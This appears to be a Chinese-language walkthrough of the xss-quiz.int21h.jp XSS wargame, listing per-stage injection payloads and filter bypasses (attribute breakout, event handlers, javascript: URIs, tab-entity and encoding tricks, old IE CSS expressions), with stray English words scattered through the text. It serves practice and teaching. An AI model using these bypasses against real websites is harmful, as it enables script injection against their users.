XSS Challenges xss-quiz.int21h.jp

概述:javascript

https://xss-quiz.int21h.jp/php

 

Stage #1前端

payload: <script>alert(document.domain);</script>java

 

Stage #2git

http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70github

嘗試: <script>alert(document.domain);</script> 未果express

input 沒有閉合瀏覽器

payload: "><svg onload=alert(document.domain)>dom

 

Stage #3xss

http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d

備註:這裏由於都是post請求,p1 變量是不存在跨站的,p2變量才存在問題,所以須要抓包

;javascript:alert(document.domain);//

 p2=<script>alert(document.domain);</script>

 

Stage #4

http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e

p3 爲隱藏的屬性,使用inspector刪除掉text=hidden

payload:"><svg onload=alert(document.domain)>;

 

Stage #5

http://xss-quiz.int21h.jp/stage–5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf

經過嘗試發現,閉合便可

<input type="text" name="p1" maxlength="15" size="30" value="hack404">

可是因爲前端對字符數量作了限制,所以抓包修改繞過

 

Stage #6

http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c

問題點:對< > 作了轉移,利用事件進行繞過

<input type="text" name="p1" size="50" value="" onmouseover=alert(document.domain);//"> 

payload:

" onmouseover=alert(document.domain);//

123" onmouseover="alert(document.domain);

<input type="text" name="p1" size="50" value="123" onmouseover="alert(document.domain);">

 

 Stage #7

http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105

<input type="text" name="p1" size="50" value=&lt;script&gt;alert(document.domain);&lt;/script&gt;>

<input type="text" name="p1" size="50" value=;onmouseover=alert(document.domain);//> 

 

對< > " ' 都已近作了轉義

payload: view plaincopyprint  onmousemove=alert(document.domain)

 

 

 

Stage #8

http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0

a 標籤,插入,點擊便可觸發 

<a href="javascript:alert(document.domain);">javascript:alert(document.domain);</a>

 

 

Stage #9

http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25

此問題,目前的瀏覽器已經不支持,由於它依賴於對UTF-7的支持

Solution:+ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp

 

Stage #10

http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276

<input type="text" name="p1" size="50" value=""><svg onload=alert(document.)>"> 

看來是長字符限制了,咱們嘗試短的字符數嘗試下

 

payload: " onmouseover=alert(document.domdomainain); x="

<input type="text" name="p1" size="50" value="" onmouseover=alert(document.domain); x=""> 

 

 Stage #11

http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3

這裏主要是針對關鍵字,進行了混淆

"><a href="javascript:alert(document.domain);">hack404</a>

<input type="text" name="p1" size="50" value=""><a href="javaxscript:alert(document.domain);">hack404</a>"> 

這裏咱們使用特殊字符進行繞過:

&#09;                %09           Horizontal tab

"><a href="javascr&#09ipt:alert(document.domain);">hack404</a>

 

<a href="javascr&#09ipt:alert(document.domain);">hack404</a>"> 

 

 

 

Stage #12

http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb

Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: "onmouseover=alert(document.domain);

 

Stage #13

http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad

Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"

Stage #14

http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8

Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"

 

Stage #15

http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726

 hex encode :

< >

\x3c \x3e

 

payload:

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

 

 

 

Stage #16

http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7

unicode encoding < >

https://www.branah.com/unicode-converter

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

 

Stage #17

http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056

存在於老版本的IE

Stage #18

http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3

存在於老版本的IE

Stage #19

http://xss-quiz.int21h.jp/stage_–19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce

訪問404了。。

 

參考:

https://blogs.tunelko.com/2013/12/02/xss-challenges/

https://github.com/matachi/MaTachi.github.io/blob/master/src/pages/solutions-to-the-wargame-xss-challenges-at-xss-quiz-int21h-jp.md

相關文章
相關標籤/搜索